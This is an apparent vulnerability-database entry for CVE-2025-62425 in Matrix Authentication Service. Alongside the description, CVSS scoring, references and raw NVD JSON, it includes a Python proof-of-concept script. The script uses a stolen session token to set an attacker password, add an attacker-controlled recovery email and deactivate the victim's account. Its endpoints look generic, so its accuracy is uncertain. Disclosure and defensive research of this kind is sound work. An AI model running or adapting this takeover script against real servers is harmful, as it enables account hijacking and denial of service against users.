CVE-2025-62425

Description

MAS (Matrix Authentication Service) is a user management and authentication service for Matrix homeservers, written and maintained by Element. A logic flaw in matrix-authentication-service 0.20.0 through 1.4.0 allows an attacker with access to an authenticated MAS session to perform sensitive operations without entering the current password. These include changing the current password, adding or removing an e-mail address and deactivating the account. The vulnerability only affects instances which have the local password database feature enabled (passwords section in the config). Patched in matrix-authentication-service 1.4.1.

CVSS Details

CVSS Score

8.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H

Configurations (Affected Products)

No configuration data available.

matrix-authentication-service >= 0.20.0

matrix-authentication-service < 1.4.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-62425 PoC - Matrix Authentication Service Sensitive Operation Without Password Re-authentication # This PoC demonstrates bypassing password verification for sensitive account operations import requests TARGET_URL = "https://mas.example.com" SESSION_TOKEN = "<attacker_obtained_session_token>" # Step 1: Change password without current password verification def exploit_change_password(new_password): """ Exploit: Change the account password without providing the current password. This allows an attacker who has an authenticated session to take over the account. """ url = f"{TARGET_URL}/account/password" headers = { "Authorization": f"Bearer {SESSION_TOKEN}", "Content-Type": "application/json" } payload = { "new_password": new_password # Note: No "current_password" field required due to the logic flaw } response = requests.post(url, json=payload, headers=headers) print(f"[*] Password change response: {response.status_code}") return response.status_code == 200 # Step 2: Add email address without password verification def exploit_add_email(email): """ Exploit: Add an attacker-controlled email address without password verification. This can be used to intercept account recovery flows. """ url = f"{TARGET_URL}/account/emails" headers = { "Authorization": f"Bearer {SESSION_TOKEN}", "Content-Type": "application/json" } payload = { "email": email } response = requests.post(url, json=payload, headers=headers) print(f"[*] Add email response: {response.status_code}") return response.status_code == 200 # Step 3: Deactivate account without password verification def exploit_deactivate_account(): """ Exploit: Deactivate the victim's account without password verification. This causes a denial-of-service condition for the legitimate user. """ url = f"{TARGET_URL}/account/deactivate" headers = { "Authorization": f"Bearer {SESSION_TOKEN}", "Content-Type": "application/json" } response = requests.post(url, headers=headers) print(f"[*] Deactivate account response: {response.status_code}") return response.status_code == 200 if __name__ == "__main__": print("[*] CVE-2025-62425 - MAS Authentication Bypass PoC") print("[*] Affected: matrix-authentication-service 0.20.0 - 1.4.0") print("[*] Only affects instances with local password database enabled\n") # Execute exploits exploit_change_password("attacker_controlled_password") exploit_add_email("[email protected]") exploit_deactivate_account()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62425
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62425
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62425/
[4] VulDB https://vuldb.com/cve/CVE-2025-62425
[5] https://github.com/element-hq/matrix-authentication-service/commit/bce99edb6177be11f8f38c1d01f5606ce7b4b2e5
[6] https://github.com/element-hq/matrix-authentication-service/security/advisories/GHSA-6wfp-jq3r-j9xh

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62425", "sourceIdentifier": "[email protected]", "published": "2025-10-16T19:15:35.120", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "MAS (Matrix Authentication Service) is a user management and authentication service for Matrix homeservers, written and maintained by Element. A logic flaw in matrix-authentication-service 0.20.0 through 1.4.0 allows an attacker with access to an authenticated MAS session to perform sensitive operations without entering the current password. These include changing the current password, adding or removing an e-mail address and deactivating the account. The vulnerability only affects instances which have the local password database feature enabled (passwords section in the config). Patched in matrix-authentication-service 1.4.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-620"}]}], "references": [{"url": "https://github.com/element-hq/matrix-authentication-service/commit/bce99edb6177be11f8f38c1d01f5606ce7b4b2e5", "source": "[email protected]"}, {"url": "https://github.com/element-hq/matrix-authentication-service/security/advisories/GHSA-6wfp-jq3r-j9xh", "source": "[email protected]"}]}}